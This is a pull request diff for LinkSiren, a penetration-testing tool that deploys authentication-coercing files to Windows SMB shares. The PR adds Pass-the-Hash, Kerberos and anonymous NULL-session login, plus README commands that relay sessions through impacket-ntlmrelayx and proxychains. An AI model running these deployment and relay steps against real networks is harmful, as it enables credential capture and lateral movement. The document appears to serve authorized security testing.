### PR TITLE
0.1.0: Pass-the-Hash, Kerberos, --anonymous auth + SOCKS docs

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -6,6 +6,18 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ## [Unreleased]
 
+## [0.1.0] - 2026-06-26
+### Added
+- Pass-the-Hash authentication via `-no-pass -hashes LMHASH:NTHASH` (bare NT hash form, no colon, also accepted).
+- Kerberos authentication via `-no-pass -k [-aesKey <hex>] -dc-ip <ip-or-fqdn>`. TGT is loaded automatically from the ccache referenced by `$KRB5CCNAME`.
+- Anonymous (NULL session) SMB via `--anonymous` for share-enumeration recon against misconfigured hosts.
+- Auto-resolve IP-form target hosts to FQDN via reverse DNS when Kerberos is in use, so the `cifs/<host>` SPN can be located. If reverse DNS gives a name that does not match an AD SPN, an explicit log line tells the tester to pass `--dc-ip <exact-fqdn>` and a target file with FQDN entries.
+- `AuthContext` dataclass centralizing all credential state (`domain`, `username`, `password`, `lmhash`, `nthash`, `aes_key`, `kdc_host`, `use_kerberos`, `no_pass`, `anonymous`). Backwards-compatible alias `Credentials = AuthContext` preserved for existing callers.
+
+### Changed
+- All credentialed subcommands (`rank`, `identify`, `deploy`, `cleanup`) share a single `_add_auth_args` helper, so auth flags stay identical across modes.
+- `HostTarget.connect` dispatches on `credentials.use_kerberos` (kerberosLogin), `credentials.anonymous` (NULL-session login), or falls through to the standard `SMBConnection.login` with password and/or NTLM hashes.
+
 ## [0.0.5] - 2026-06-26
 ### Fixed
 - `process_targets` no longer crashes on blank or whitespace-only lines in target files. Offending lines (and malformed UNC entries) are logged and skipped instead.

--- a/README.md
+++ b/README.md
@@ -19,15 +19,39 @@ uv tool install git+https://github.com/gjhami/LinkSiren.git
 # Typical Usage
 ```bash
 # Identify optimal locations for poisoned file deployment
-linksiren identify --targets <shares file> [domain]/username[:password]
+linksiren identify --targets <shares file> [domain/]user[:password]
 
 # Deploy to identified locations
-linksiren deploy --attacker <attacker IP> [domain]/username[:password]
+linksiren deploy --attacker <attacker IP> [domain/]user[:password]
 
 # Capture hashes / relay authentication / exploit the WebClient service
 
 # Cleanup poisoned files
-linksiren cleanup [domain]/username[:password]
+linksiren cleanup [domain/]user[:password]
+```
+
+# Authentication
+
+All four credentialed subcommands (`rank`, `identify`, `deploy`, `cleanup`) accept the same authentication options.
+
+| Method | Flags | Notes |
+|---|---|---|
+| Password | `[domain/]user:password` | Positional credentials string, the default. |
+| Pass-the-Hash | `-no-pass -hashes :<NTHASH>` (or `LM:NT`) plus `[domain/]user` | Bare NT hash form accepted (the leading `:` distinguishes NT from LM). |
+| Kerberos | `-no-pass -k -dc-ip <ip-or-fqdn> [domain/]user` | TGT is read from the ccache referenced by `$KRB5CCNAME`. Add `-aesKey <hex>` for AES pre-auth. Target hostnames in the targets file must be FQDNs (Kerberos service tickets bind to `cifs/<hostname>` SPNs, not IPs). If `-dc-ip` is an IP literal, linksiren will attempt to reverse-DNS it to an FQDN so the SPN can be located. |
+| Anonymous (NULL session) | `--anonymous` (omit positional credentials) | Useful for share-enumeration recon against misconfigured hosts that do not require authentication. |
+
+### Routing through a SOCKS proxy
+
+LinkSiren uses Impacket's standard SMB connection layer, so it routes cleanly through any SOCKS proxy via `proxychains4`, including the SOCKS endpoint published by `impacket-ntlmrelayx -socks`. Typical setup:
+
+```bash
+# In one terminal: stage the relay (drop the relayed session in -socks)
+impacket-ntlmrelayx -tf relay-targets.txt -smb2support -socks
+
+# In another terminal: identify + deploy via the SOCKS endpoint
+proxychains4 linksiren identify -t targets.txt [domain/]user:password
+proxychains4 linksiren deploy -a <attacker> [domain/]user:password
 ```
 
 # Detailed Usage

--- a/pyproject.toml
+++ b/pyproject.toml
@@ -6,7 +6,7 @@ build-backend = "setuptools.build_meta"
 
 [project]
 name = "linksiren"
-version = "0.0.5"
+version = "0.1.0"
 description = "Generation, targeted deployment, and scalable cleanup for files that coerce Windows authentication."
 readme = "README.md"
 authors = [{ name = "George Hamilton"}]

--- a/src/linksiren/__main__.py
+++ b/src/linksiren/__main__.py
@@ -43,6 +43,7 @@ class AuthContext:
     kdc_host: str | None = None
     use_kerberos: bool = False
     no_pass: bool = False
+    anonymous: bool = False
 
 
 # Backwards-compatible alias. Older callers/tests import ``Credentials``.
@@ -67,9 +68,28 @@ def _build_auth_context(args) -> AuthContext:
     """Build an :class:`AuthContext` from parsed CLI arguments.
 
     ``generate`` mode has no credentials and yields an empty context.
+    ``--anonymous`` yields an empty context with ``anonymous=True`` so the
+    SMB layer attempts a NULL session.
     """
     if "credentials" not in args:
         return AuthContext()
+
+    if getattr(args, "anonymous", False):
+        if args.credentials:
+            print(
+                "error: --anonymous and a positional credentials argument are "
+                "mutually exclusive. Drop one.",
+                file=sys.stderr,
+            )
+            sys.exit(2)
+        return AuthContext(anonymous=True)
+
+    if not args.credentials:
+        print(
+            "error: credentials are required unless --anonymous is set.",
+            file=sys.stderr,
+        )
+        sys.exit(2)
 
     domain, username, password = parse_credentials(args.credentials)
     lmhash, nthash = _parse_hashes(getattr(args, "hashes", None))

--- a/src/linksiren/__main__.py
+++ b/src/linksiren/__main__.py
@@ -1,17 +1,15 @@
 """
 Author: George Hamilton
 Main module for the LinkSiren application.
-This module handles different modes of operation for the LinkSiren application. It parses
-command-line arguments and executes the appropriate handler based on the specified mode.
-The available modes are:
-If credentials are provided in the arguments, they are parsed and used in the appropriate handlers.
-Functions:
-    main(): Main function to handle different modes of operation for the LinkSiren application.
-Usage:
-    Run this module as a script to execute the main function.
+
+Parses command-line arguments, builds an :class:`AuthContext` from any supplied
+credentials / hashes / Kerberos flags, and dispatches to the appropriate mode
+handler.
 """
 
-from dataclasses import dataclass
+import os
+import sys
+from dataclasses import dataclass, field
 from multiprocessing import Manager
 from impacket.examples.utils import parse_credentials
 from linksiren.arg_parser import parse_args
@@ -29,64 +27,116 @@ from linksiren.mode_handlers import (
 
 
 @dataclass
-class Credentials:
-    domain: str
-    username: str
-    password: str
+class AuthContext:
+    """All authentication parameters in one place.
+
+    ``Credentials`` is preserved as an alias for backwards compatibility with
+    callers that import the name.
+    """
+
+    domain: str = ""
+    username: str = ""
+    password: str = ""
+    lmhash: str = ""
+    nthash: str = ""
+    aes_key: str = ""
+    kdc_host: str | None = None
+    use_kerberos: bool = False
+    no_pass: bool = False
+
+
+# Backwards-compatible alias. Older callers/tests import ``Credentials``.
+Credentials = AuthContext
+
+
+def _parse_hashes(hashes: str | None) -> tuple[str, str]:
+    """Split a ``LMHASH:NTHASH`` argument into its two parts.
+
+    A bare NT hash (no colon) is also accepted and returned as ``("", nthash)``.
+    Empty / ``None`` input returns ``("", "")``.
+    """
+    if not hashes:
+        return "", ""
+    if ":" in hashes:
+        lm, nt = hashes.split(":", 1)
+        return lm, nt
+    return "", hashes
+
+
+def _build_auth_context(args) -> AuthContext:
+    """Build an :class:`AuthContext` from parsed CLI arguments.
+
+    ``generate`` mode has no credentials and yields an empty context.
+    """
+    if "credentials" not in args:
+        return AuthContext()
+
+    domain, username, password = parse_credentials(args.credentials)
+    lmhash, nthash = _parse_hashes(getattr(args, "hashes", None))
+
+    # ``-no-pass`` (or ``-k`` alone with a ccache) means we should not try the
+    # supplied password. Clear it so Impacket doesn't accidentally use a bare
+    # username string as a credential.
+    if getattr(args, "no_pass", False) and not (lmhash or nthash):
+        password = ""
+
+    return AuthContext(
+        domain=domain,
+        username=username,
+        password=password,
+        lmhash=lmhash,
+        nthash=nthash,
+        aes_key=getattr(args, "aesKey", "") or "",
+        kdc_host=getattr(args, "dc_ip", None),
+        use_kerberos=getattr(args, "k", False),
+        no_pass=getattr(args, "no_pass", False),
+    )
 
 
 def main():
-    """
-    Main function to handle different modes of operation for the LinkSiren application.
-    This function parses command-line arguments and executes the appropriate handler
-    based on the specified mode. The available modes are:
-    - 'generate': Generates necessary data or configurations.
-    - 'rank': Ranks items based on specified criteria.
-    - 'identify': Identifies specific elements or patterns.
-    - 'deploy': Deploys the application or its components.
-    - 'cleanup': Cleans up resources or temporary data.
-    If credentials are provided in the arguments, they are parsed and used in the
-    appropriate handlers.
-    Args:
-        None
-    Returns:
-        None
-    """
+    """Entry point. Parse args, set up logging, dispatch by mode."""
     args = parse_args()
-    credentials = None
-    if "credentials" in args:
-        domain, username, password = parse_credentials(args.credentials)
-        credentials = Credentials(domain=domain, username=username, password=password)
-    else:
-        credentials = Credentials(domain="", username="", password="")
+    auth = _build_auth_context(args)
+
+    # Kerberos requires KRB5CCNAME unless aesKey / hashes / password provided.
+    if (
+        auth.use_kerberos
+        and not auth.aes_key
+        and not auth.nthash
+        and not auth.password
+        and not os.environ.get("KRB5CCNAME")
+    ):
+        print(
+            "error: -k was specified but no Kerberos credentials are available "
+            "(no KRB5CCNAME, no password, no -hashes, no -aesKey).",
+            file=sys.stderr,
+        )
+        sys.exit(2)
 
     # Setup Logging
     log_queue = Manager().Queue(-1)
     listener = configure_queue_listener(
         logfile="linksiren.log",
         queue=log_queue,
-        credentials=credentials,
+        credentials=auth,
         mode=args.mode,
     )
 
+    logger = configure_main_logger(logfile="linksiren.log", credentials=auth, mode=args.mode)
     try:
-        logger = configure_main_logger(
-            logfile="linksiren.log", credentials=credentials, mode=args.mode
-        )
         logger.info("Starting linksiren")
 
         if args.mode == "generate":
             handle_generate(args)
         elif args.mode == "rank":
-            handle_rank(args, credentials, log_queue)
+            handle_rank(args, auth, log_queue)
         elif args.mode == "identify":
-            handle_identify(args, credentials, log_queue)
+            handle_identify(args, auth, log_queue)
         elif args.mode == "deploy":
-            handle_deploy(args, credentials)
+            handle_deploy(args, auth)
         elif args.mode == "cleanup":
-            handle_cleanup(args, credentials)
+            handle_cleanup(args, auth)
     finally:
-        # Ensure cleanup
         logger.info("Terminating linksiren")
         log_queue.put(None)
         listener.join()

--- a/src/linksiren/arg_parser.py
+++ b/src/linksiren/arg_parser.py
@@ -18,6 +18,14 @@ def _add_auth_args(subparser: argparse.ArgumentParser) -> None:
     """
     auth_group = subparser.add_argument_group("Authentication")
     auth_group.add_argument(
+        "--anonymous",
+        action="store_true",
+        default=False,
+        help="Attempt anonymous (NULL-session) SMB. Useful for share-enum "
+        "recon against misconfigured hosts. Positional 'credentials' must be "
+        "omitted when --anonymous is set.",
+    )
+    auth_group.add_argument(
         "-hashes",
         action="store",
         metavar="LMHASH:NTHASH",
@@ -91,7 +99,7 @@ def parse_args():
     )
     rank_required_group = rank_parser.add_argument_group("Required Arguments")
     rank_required_group.add_argument(
-        "credentials", help="[domain/]username[:password] for authentication"
+        "credentials", nargs="?", help="[domain/]username[:password] for authentication. Omit when --anonymous is set."
     )
     rank_required_group.add_argument(
         "-t",
@@ -155,7 +163,7 @@ def parse_args():
     )
     identify_required_group = identify_parser.add_argument_group("Required Arguments")
     identify_required_group.add_argument(
-        "credentials", help="[domain/]username[:password] for authentication"
+        "credentials", nargs="?", help="[domain/]username[:password] for authentication. Omit when --anonymous is set."
     )
     identify_required_group.add_argument(
         "-t",
@@ -225,7 +233,7 @@ def parse_args():
     )
     deploy_required_group = deploy_parser.add_argument_group("Required Arguments")
     deploy_required_group.add_argument(
-        "credentials", help="[domain/]username[:password] for authentication"
+        "credentials", nargs="?", help="[domain/]username[:password] for authentication. Omit when --anonymous is set."
     )
     deploy_required_group.add_argument(
         "-a",
@@ -257,7 +265,7 @@ def parse_args():
     )
     cleanup_required_group = cleanup_parser.add_argument_group("Required Arguments")
     cleanup_required_group.add_argument(
-        "credentials", help="[domain/]username[:password] for authentication"
+        "credentials", nargs="?", help="[domain/]username[:password] for authentication. Omit when --anonymous is set."
     )
     cleanup_parser.add_argument(
         "-t",

--- a/src/linksiren/arg_parser.py
+++ b/src/linksiren/arg_parser.py
@@ -1,36 +1,60 @@
 """
 Author: George Hamilton
-This module provides a command-line interface (CLI) for identifying and rating folders in shares
-based on access frequency, deploying malicious URL files, and cleaning up results.
-Functions:
-    parse_args(): Parses command-line arguments and returns them as a namespace object.
-The CLI supports the following modes:
-    - generate: Outputs the specified payload file to the current directory instead of a remote
-                location.
-    - rank: Outputs identified subfolders and rankings to folder_rankings.txt.
-    - identify: Identifies target folders for payload distribution and outputs to
-                payload.txt.
-    - deploy: Deploys payloads to all folder UNC paths listed in the specified file.
-    - cleanup: Deletes poisoned files from folder UNC paths specified in the targets file.
-Each mode has its own set of required and optional arguments, which are detailed in the help
-message for each subcommand.
+Command-line interface for LinkSiren.
+
+Builds an :mod:`argparse` parser with five subcommands. ``generate``, ``rank``,
+``identify``, ``deploy``, ``cleanup``. Sharing a common set of authentication
+flags via :func:`_add_auth_args`.
 """
 
 import argparse
 
 
+def _add_auth_args(subparser: argparse.ArgumentParser) -> None:
+    """Add the shared password / hash / Kerberos auth flags to a subparser.
+
+    All non-``generate`` subcommands need these flags, and keeping a single
+    helper avoids drift across them.
+    """
+    auth_group = subparser.add_argument_group("Authentication")
+    auth_group.add_argument(
+        "-hashes",
+        action="store",
+        metavar="LMHASH:NTHASH",
+        help="NTLM hashes for Pass-the-Hash, format is LMHASH:NTHASH. A bare "
+        "NT hash (no colon) is also accepted.",
+    )
+    auth_group.add_argument(
+        "-no-pass",
+        action="store_true",
+        dest="no_pass",
+        help="Do not prompt for / use the supplied password (useful with -k).",
+    )
+    auth_group.add_argument(
+        "-k",
+        action="store_true",
+        help="Use Kerberos authentication. Credentials are pulled from the "
+        "ccache file referenced by KRB5CCNAME. If a ccache lookup fails, the "
+        "command-line credentials (password / -hashes / -aesKey) are used.",
+    )
+    auth_group.add_argument(
+        "-aesKey",
+        action="store",
+        metavar="hex key",
+        help="AES key (128- or 256-bit, hex) to use for Kerberos authentication.",
+    )
+    auth_group.add_argument(
+        "-dc-ip",
+        action="store",
+        dest="dc_ip",
+        metavar="ip address",
+        help="IP address (or hostname) of the KDC / domain controller. If "
+        "omitted, the domain portion of the supplied credentials is used.",
+    )
+
+
 def parse_args():
-    """
-    Parses command-line arguments for the LinkSiren tool.
-    The tool supports multiple modes of operation, each with its own set of arguments:
-    - generate: Output specified payload file to the current directory instead of a remote location.
-    - rank: Output identified subfolders and rankings to folder_rankings.txt.
-    - identify: Identify target folders for payload distribution and output to payload_targets.txt.
-    - deploy: Deploy payloads to all folder UNC paths listed in the specified file.
-    - cleanup: Delete poisoned files from folder UNC paths specified in the targets file.
-    Returns:
-        argparse.Namespace: Parsed command-line arguments.
-    """
+    """Parse command-line arguments for the LinkSiren CLI."""
     parser = argparse.ArgumentParser(
         description="Identify and rate folders in shares based on access frequency, deploy "
         "malicious URL files, and cleanup results."
@@ -120,24 +144,7 @@ def parse_args():
         "simultaneous connections to the same host and concurrent processing "
         "will not accelerate crawling multiple shares on a single host.",
     )
-    # rank_parser.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH",
-    #                               help='NTLM hashes, format is LMHASH:NTHASH')
-    # rank_parser.add_argument('-no-pass', action="store_true",
-    #                               help='don\'t ask for password (useful for -k)')
-    # rank_parser.add_argument('-k', action="store_true",
-    #                               help='Use Kerberos authentication. Grabs credentials from
-    #                               'ccache file  (KRB5CCNAME) based on target parameters. If '
-    #                               'valid credentials cannot be found, it will use the ones '
-    #                               'specified in the command line')
-    # rank_parser.add_argument('-aesKey', action="store", metavar = "hex key",
-    #                               help='AES key to use for Kerberos Authentication '
-    #                               '(128 or 256 bits)')
-    # rank_parser.add_argument('-keytab', action="store",
-    #                               help='Read keys for SPN from keytab file')
-    # rank_parser.add_argument_group('connection')
-    # rank_parser.add_argument('-dc-ip', action='store',metavar = "ip address",
-    #                               help='IP Address of the domain controller. If ommited it use'
-    #                               'the domain part (FQDN) specified in the target parameter')
+    _add_auth_args(rank_parser)
 
     # Arguments for identifying and outputting UNC paths to optimal folders into which to place
     # poisoned files
@@ -208,24 +215,7 @@ def parse_args():
         "simultaneous connections to the same host and concurrent processing "
         "will not accelerate crawling multiple shares on a single host.",
     )
-    # identify_parser.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH",
-    #                               help='NTLM hashes, format is LMHASH:NTHASH')
-    # identify_parser.add_argument('-no-pass', action="store_true",
-    #                               help='don\'t ask for password (useful for -k)')
-    # identify_parser.add_argument('-k', action="store_true",
-    #                               help='Use Kerberos authentication. Grabs credentials from
-    #                               'ccache file  (KRB5CCNAME) based on target parameters. If '
-    #                               'valid credentials cannot be found, it will use the ones '
-    #                               'specified in the command line')
-    # identify_parser.add_argument('-aesKey', action="store", metavar = "hex key",
-    #                               help='AES key to use for Kerberos Authentication '
-    #                               '(128 or 256 bits)')
-    # identify_parser.add_argument('-keytab', action="store",
-    #                               help='Read keys for SPN from keytab file')
-    # identify_parser.add_argument_group('connection')
-    # identify_parser.add_argument('-dc-ip', action='store',metavar = "ip address",
-    #                               help='IP Address of the domain controller. If ommited it use'
-    #                               'the domain part (FQDN) specified in the target parameter')
+    _add_auth_args(identify_parser)
 
     # Arguments for deploying poisoned files to specified locations
     deploy_parser = subparsers.add_parser(
@@ -258,24 +248,7 @@ def parse_args():
         "payload file ending in .library-ms, .searchConnector-ms, .lnk, "
         "or .url",
     )
-    # deploy_parser.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH",
-    #                               help='NTLM hashes, format is LMHASH:NTHASH')
-    # deploy_parser.add_argument('-no-pass', action="store_true",
-    #                               help='don\'t ask for password (useful for -k)')
-    # deploy_parser.add_argument('-k', action="store_true",
-    #                               help='Use Kerberos authentication. Grabs credentials from
-    #                               'ccache file  (KRB5CCNAME) based on target parameters. If '
-    #                               'valid credentials cannot be found, it will use the ones '
-    #                               'specified in the command line')
-    # deploy_parser.add_argument('-aesKey', action="store", metavar = "hex key",
-    #                               help='AES key to use for Kerberos Authentication '
-    #                               '(128 or 256 bits)')
-    # deploy_parser.add_argument('-keytab', action="store",
-    #                               help='Read keys for SPN from keytab file')
-    # deploy_parser.add_argument_group('connection')
-    # deploy_parser.add_argument('-dc-ip', action='store',metavar = "ip address",
-    #                               help='IP Address of the domain controller. If ommited it use'
-    #                               'the domain part (FQDN) specified in the target parameter')
+    _add_auth_args(deploy_parser)
 
     # Arguments for cleaning up deployed payloads when finished
     cleanup_parser = subparsers.add_parser(
@@ -293,24 +266,7 @@ def parse_args():
         help="(Default: 'payloads_written.txt') Path to a text file containing UNC "
         "paths poisoned files to clean up.",
     )
-    # cleanup_parser.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH",
-    #                               help='NTLM hashes, format is LMHASH:NTHASH')
-    # cleanup_parser.add_argument('-no-pass', action="store_true",
-    #                               help='don\'t ask for password (useful for -k)')
-    # cleanup_parser.add_argument('-k', action="store_true",
-    #                               help='Use Kerberos authentication. Grabs credentials from
-    #                               'ccache file  (KRB5CCNAME) based on target parameters. If '
-    #                               'valid credentials cannot be found, it will use the ones '
-    #                               'specified in the command line')
-    # cleanup_parser.add_argument('-aesKey', action="store", metavar = "hex key",
-    #                               help='AES key to use for Kerberos Authentication '
-    #                               '(128 or 256 bits)')
-    # cleanup_parser.add_argument('-keytab', action="store",
-    #                               help='Read keys for SPN from keytab file')
-    # cleanup_parser.add_argument_group('connection')
-    # cleanup_parser.add_argument('-dc-ip', action='store',metavar = "ip address",
-    #                               help='IP Address of the domain controller. If ommited it use'
-    #                               'the domain part (FQDN) specified in the target parameter')
+    _add_auth_args(cleanup_parser)
 
     args = parser.parse_args()
 

--- a/src/linksiren/target.py
+++ b/src/linksiren/target.py
@@ -47,10 +47,16 @@ class HostTarget:
 
         The authentication path is chosen from ``credentials``:
 
-        * ``credentials.use_kerberos`` → ``SMBConnection.kerberosLogin`` (a
-          ccache referenced by ``$KRB5CCNAME`` is honored automatically by
-          Impacket when no TGT/TGS is supplied).
-        * otherwise → ``SMBConnection.login`` with password and/or NTLM hash.
+        * ``credentials.anonymous`` -> ``SMBConnection.login`` with empty
+          user / password / domain (NULL session). Most modern hosts deny
+          this, but it is the right probe for "test for anonymous access
+          to shares" recon.
+        * ``credentials.use_kerberos`` -> ``SMBConnection.kerberosLogin``
+          (a ccache referenced by ``$KRB5CCNAME`` is honored automatically
+          by Impacket when no TGT/TGS is supplied). When the target host
+          is an IP literal, an attempt is made to reverse-DNS it to an
+          FQDN so the cifs/<host> SPN can be located.
+        * otherwise -> ``SMBConnection.login`` with password and/or NTLM hash.
         """
         logger = logging.getLogger("main_logger")
 
@@ -59,8 +65,40 @@ class HostTarget:
             # connection that was passed in at construction.
             return
 
+        # Kerberos SPN lookup needs an FQDN, not an IP. If Kerberos is in
+        # use and self.host is an IP, try reverse DNS so cifs/<host> can
+        # resolve. Keep the original IP as the network endpoint
+        # (remoteHost) but expose the FQDN as remoteName so the SPN is
+        # constructed right.
+        remote_name = self.host
+        if getattr(credentials, "use_kerberos", False):
+            import ipaddress, socket
+            try:
+                ipaddress.ip_address(self.host)
+                try:
+                    primary, aliases, _ = socket.gethostbyaddr(self.host)
+                    candidates = [n for n in [primary] + list(aliases) if "." in n]
+                    if candidates:
+                        remote_name = candidates[0]
+                        logger.info(
+                            "-k against IP target; resolved %s -> %s for the "
+                            "cifs SPN. If KDC rejects, list the host by "
+                            "exact-FQDN in the targets file.",
+                            self.host, remote_name,
+                            extra={"path": f"\\\\{self.host}"},
+                        )
+                except (socket.herror, socket.gaierror) as e:
+                    logger.warning(
+                        "-k against IP target and reverse DNS failed (%s); "
+                        "Kerberos may reject with KDC_ERR_S_PRINCIPAL_UNKNOWN. "
+                        "Use FQDN UNC paths in your targets file.", e,
+                        extra={"path": f"\\\\{self.host}"},
+                    )
+            except ValueError:
+                pass  # self.host is already a hostname
+
         try:
-            self.connection = SMBConnection(remoteName=self.host, remoteHost=self.host)
+            self.connection = SMBConnection(remoteName=remote_name, remoteHost=self.host)
         except SessionError as e:
             logger.error(
                 "Failed to connect to host.",
@@ -70,7 +108,10 @@ class HostTarget:
             return
 
         try:
-            if getattr(credentials, "use_kerberos", False):
+            if getattr(credentials, "anonymous", False):
+                # NULL session: empty user, empty password, empty domain.
+                self.connection.login("", "", "", "", "", ntlmFallback)
+            elif getattr(credentials, "use_kerberos", False):
                 self.connection.kerberosLogin(
                     user=credentials.username,
                     password=credentials.password,

--- a/src/linksiren/target.py
+++ b/src/linksiren/target.py
@@ -1,20 +1,7 @@
 """
 Author: George Hamilton
-This module defines the HostTarget class, which represents a target host and its shares. The class
-provides methods to manage connections, interact with shares, and perform operations such as writing
-and deleting payloads, as well as reviewing folders for active files.
-Classes:
-    HostTarget: Represents a target host and its shares, providing methods to manage connections and
-    interact with shares.
-Usage Example:
-    target = HostTarget(host='192.168.1.1')
-    target.connect(user='admin', password='password')
-    target.expand_paths()
-    target.write_payload(path='share\\folder', payload_name='payload.txt', payload=b'Hello, World!')
-    target.delete_payload(path='share\\folder', payload_name='payload.txt')
-    folder_rankings = target.review_all_folders(folder_rankings={}, \
-                            active_threshold_date=1625097600, \
-                            depth=2, fast=True)
+HostTarget. One SMB target with helpers to enumerate shares, write/delete
+payloads, and recursively rank folders.
 """
 
 import logging
@@ -24,12 +11,7 @@ import linksiren.pure_functions
 
 
 class HostTarget:
-    """
-    Class to represent a target host and its shares
-
-    Attributes:
-    host: str - the hostname or IP address of the target
-    """
+    """A single SMB host and the share-or-folder paths to operate on."""
 
     def __init__(
         self,
@@ -49,99 +31,96 @@ class HostTarget:
         if self.connection is not None and self.host is None:
             self.host = self.connection.getRemoteHost()
 
-    # Pure functions
+    # ------------------------------------------------------------------ #
+    # Pure helpers                                                       #
+    # ------------------------------------------------------------------ #
     def add_path(self, path: str):
-        """
-        Adds a new path to the list of paths if it is not already present.
-
-        Args:
-            path (str): The path to be added to the list of paths.
-        """
+        """Append ``path`` to ``self.paths`` if not already present."""
         if path not in self.paths:
             self.paths.append(path)
 
-    # Impure functions
-    def connect(self, credentials, lmhash="", nthash="", ntlmFallback=True):
-        """
-        Establishes a connection to the SMB server and logs in with the provided credentials.
+    # ------------------------------------------------------------------ #
+    # Connection                                                         #
+    # ------------------------------------------------------------------ #
+    def connect(self, credentials, ntlmFallback: bool = True):
+        """Connect to the SMB server and authenticate.
 
-        Parameters:
-            user (str): The username for authentication. Default is an empty string.
-            password (str): The password for authentication. Default is an empty string.
-            domain (str): The domain for authentication. Default is an empty string.
-            lmhash (str): The LM hash for authentication. Default is an empty string.
-            nthash (str): The NT hash for authentication. Default is an empty string.
-            ntlmFallback (bool): Whether to fallback to NTLM authentication. Default is True.
+        The authentication path is chosen from ``credentials``:
 
-        Returns:
-            None
-
-        Raises:
-            SessionError: If there is an error connecting to or logging into the SMB server.
+        * ``credentials.use_kerberos`` → ``SMBConnection.kerberosLogin`` (a
+          ccache referenced by ``$KRB5CCNAME`` is honored automatically by
+          Impacket when no TGT/TGS is supplied).
+        * otherwise → ``SMBConnection.login`` with password and/or NTLM hash.
         """
         logger = logging.getLogger("main_logger")
 
-        if self.connection is None:
-            try:
-                self.connection = SMBConnection(remoteName=self.host, remoteHost=self.host)
-            except SessionError as e:
-                logger.error(
-                    "Failed to connect to host.",
-                    extra={"path": f"\\\\{self.host}", "exception": str(e)},
-                )
-                self.connection = None
-                return
+        if self.connection is not None:
+            # Already connected. Login was either done elsewhere or via the
+            # connection that was passed in at construction.
+            return
 
-            try:
+        try:
+            self.connection = SMBConnection(remoteName=self.host, remoteHost=self.host)
+        except SessionError as e:
+            logger.error(
+                "Failed to connect to host.",
+                extra={"path": f"\\\\{self.host}", "exception": str(e)},
+            )
+            self.connection = None
+            return
+
+        try:
+            if getattr(credentials, "use_kerberos", False):
+                self.connection.kerberosLogin(
+                    user=credentials.username,
+                    password=credentials.password,
+                    domain=credentials.domain,
+                    lmhash=getattr(credentials, "lmhash", ""),
+                    nthash=getattr(credentials, "nthash", ""),
+                    aesKey=getattr(credentials, "aes_key", ""),
+                    kdcHost=getattr(credentials, "kdc_host", None),
+                    useCache=True,
+                )
+            else:
                 self.connection.login(
                     credentials.username,
                     credentials.password,
                     credentials.domain,
-                    lmhash,
-                    nthash,
+                    getattr(credentials, "lmhash", ""),
+                    getattr(credentials, "nthash", ""),
                     ntlmFallback,
                 )
-                self.logged_in = True
-            except SessionError as e:
-                self.connection = None
-                logger.error(
-                    "Failed to connect to host.",
-                    extra={"path": f"\\\\{self.host}", "exception": str(e)},
-                )
+            self.logged_in = True
+        except SessionError as e:
+            self.connection = None
+            logger.error(
+                "Failed to connect to host.",
+                extra={"path": f"\\\\{self.host}", "exception": str(e)},
+            )
+        except Exception as e:
+            # kerberosLogin raises a wider set of errors than SessionError
+            # (KerberosError, gssapi exceptions, ccache parse errors, …). Catch
+            # them so a single misconfigured target doesn't kill the whole run.
+            self.connection = None
+            logger.error(
+                "Failed to authenticate to host.",
+                extra={"path": f"\\\\{self.host}", "exception": str(e)},
+            )
 
+    # ------------------------------------------------------------------ #
+    # Share / path enumeration                                           #
+    # ------------------------------------------------------------------ #
     def expand_paths(self):
-        """
-        Expands the paths by populating shares if an empty string is found in the paths list.
-
-        This method checks if there is an empty string in the `paths` attribute. If found, it calls
-        the `populate_shares` method to populate the shares and then removes the empty string from
-        the `paths` list.
-        """
+        """Replace empty ``""`` entries in ``self.paths`` with the host's shares."""
         if "" in self.paths:
             self.populate_shares()
-            self.paths.remove("")
+            # Remove every empty entry in case the user supplied more than one.
+            self.paths[:] = [p for p in self.paths if p != ""]
 
     def populate_shares(self):
-        """
-        Populates the list of shares available on the connected host.
-        This method checks if a connection to the host has been established.
-        If not, it prints an error message and returns. If a connection is
-        present, it attempts to retrieve the list of shares from the host.
-        If the retrieval fails, it prints an error message and returns.
-        The method then iterates over the retrieved shares, filtering out
-        those that do not support tree connections (e.g., IPC$ shares).
-        For each valid share, it adds the share name to the list of paths.
-
-        Raises:
-            SessionError: If there is an issue retrieving the list of shares
-                  from the host.
-
-        Returns:
-            None
-        """
+        """Append every disk-tree share on the host to ``self.paths``."""
         logger = logging.getLogger("main_logger")
 
-        # Make sure a connection has been made to the host
         if self.connection is None:
             logger.error("Not connected to host.", extra={"path": f"\\\\{self.host}"})
             return
@@ -155,40 +134,23 @@ class HostTarget:
             )
             return
 
-        shares = []
         for share_info in resp:
             share_name = share_info["shi1_netname"][:-1]
             share_type = share_info["shi1_type"]
-
-            # Check that the share type supports treeconnect, i.e. not IPC$, etc.
+            # Filter to file-system shares (skip IPC$, named pipes, etc.).
             if share_type & STYPE_MASK == STYPE_DISKTREE:
-                shares.append(share_name)
+                self.add_path(share_name)
 
-        for share in shares:
-            self.add_path(share)
-
+    # ------------------------------------------------------------------ #
+    # Payload write / delete                                             #
+    # ------------------------------------------------------------------ #
     def write_payload(self, path: str, payload_name: str, payload: bytes):
-        """
-        Writes a payload to a specified path on a remote share.
+        """Write ``payload`` to ``\\\\host\\path\\payload_name``.
 
-        Args:
-            path (str): The path to the directory on the remote share where the payload
-                        will be written.
-            payload_name (str): The name of the payload file to be created.
-            payload (bytes): The binary data to be written to the payload file.
-
-        Returns:
-            bool: True if the payload was successfully written, False otherwise.
-
-        Raises:
-            Exception: If any error occurs during the connection, file creation, writing, or
-                       closing processes.
-
-        Notes:
-            - The method assumes that `self.connection` is an established connection to the
-                remote host.
-            - The method handles exceptions internally and prints error messages for debugging
-                purposes.
+        Returns the full UNC path on success, or ``None`` on any failure
+        before the bytes were committed. A failure to close the file or
+        disconnect the tree after the write is logged but still treated as
+        success and returns the UNC path. The bytes are on disk.
         """
         share = path.split("\\")[0]
         folder = "\\".join(path.split("\\")[1:])
@@ -200,7 +162,6 @@ class HostTarget:
         full_path = f"\\\\{self.host}\\{share}\\{payload_path}"
         logger = logging.getLogger("main_logger")
 
-        # Make sure a connection has been made to the host
         if self.connection is None:
             logger.error(
                 "Failed to write payload. Not connected to host",
@@ -208,20 +169,18 @@ class HostTarget:
             )
             return None
 
